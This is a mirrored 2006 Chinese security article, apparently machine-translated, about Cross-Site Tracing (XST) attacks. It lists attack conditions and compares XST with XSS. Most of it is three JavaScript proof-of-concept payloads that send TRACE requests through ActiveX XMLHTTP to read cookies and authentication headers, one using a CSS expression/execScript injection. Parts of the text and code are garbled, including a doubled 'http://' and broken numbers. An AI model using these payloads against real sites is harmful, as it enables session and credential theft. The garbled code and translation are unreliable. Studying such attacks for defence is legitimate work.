Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220066129
HistoryJan 06, 2006 - 12:00 a.m.

Cross-site tracing XST attack-vulnerability warning-the black bar safety net

2006-01-0600:00:00
佚名
www.myhack58.com
111
JSON

XST attack is the attacker’s malicious code is embedded on the host Web file, when the visitor’s browser, the malicious code in the browser to perform,
Then the visitor’s Cookie, http Basic authentication, and NTLM authentication information will be sent to the controlled host, and transmit a Trace request to the target host, causing the Cookie to deceive or middle attack.

XST attack conditions:
1, The need to targetthe Web serverallows the Trace parameters;
2, need one to insert the XST code;
3, the target site the presence of cross-domain vulnerabilities.

XST withXSS:
The same point: has great deceptive, you can host cause harm, but this attack is cross-platform, we can also use Active controls, Flash, Java, etc. to carry out XST andXSSattack.
Advantages: you can bypass the General http authentication and NTLM authentication

The use of technique 1: The
<script type=“text/javascript”>
<!–
function xssTRACE(){
var xmlHttp=new ActiveXObject(“Microsoft. XMLHTTP”);
xmlHttp. open(“TRACE”,“http://wmjie.51.net/swords/”,false);
xmlHttp. send();
xmlDoc=xmlHttp. responseText;
alert(xmlDoc);
}

//–>
</script>
<INPUT TYPE=BUTTON VALUE=’XSS TRACE’>

Approach 2: The
<script type=“text/javascript”>
<!–
function xssTRACE() {
var openWin=open(“blank.htm”,“swords”,“width=5 0 0,height=4 0 0”);
var otraceswords=openWin. external;
openWin. location. href=“http://wmjie.51.net/swords/”;
setTimeout(
function () {
//The following must be written in one line
otraceswords. NavigateAndFind(’javascript:xmlHttp=new ActiveXObject(“Microsoft. XMLHTTP”);xmlHttp. open(“TRACE”,“http://wmjie.51.net/swords/”,false);xmlHttp. send();xmlDoc=xmlHttp. responseText;alert(“no document. Cookie 显示 站点 wmjie.51.net/swords/ the header information.\\ n” + xmlDoc);’,“”,“”);
},
1 0 2 4
);
}
//–>
</script>
<INPUT TYPE=BUTTON VALUE=’XSS TRACE’>

Approach 3: The
<script type=“text/javascript”>
function xssTRACE(){
var swords = “var xmlHttp = new ActiveXObject("Microsoft. XMLHTTP");xmlHttp. open("TRACE","http://http://www.tingh.com/",false);xmlHttp. send();xmlDoc=xmlHttp. responseText;alert(xmlDoc);”;
var target = “http://wmjie.51.net/swords/”;
spinach = encodeURIComponent(swords + ’;top. close()’);
var readyCode = ’font-size:expression(execScript(decodeURIComponent(“’ + spinach + ’”)))’;
the showModalDialog(target, null, readyCode);
}
</script>
<INPUT TYPE=BUTTON VALUE=’XSS TRACE’>

I use the team Forum Cookies and my site for testing.

JSON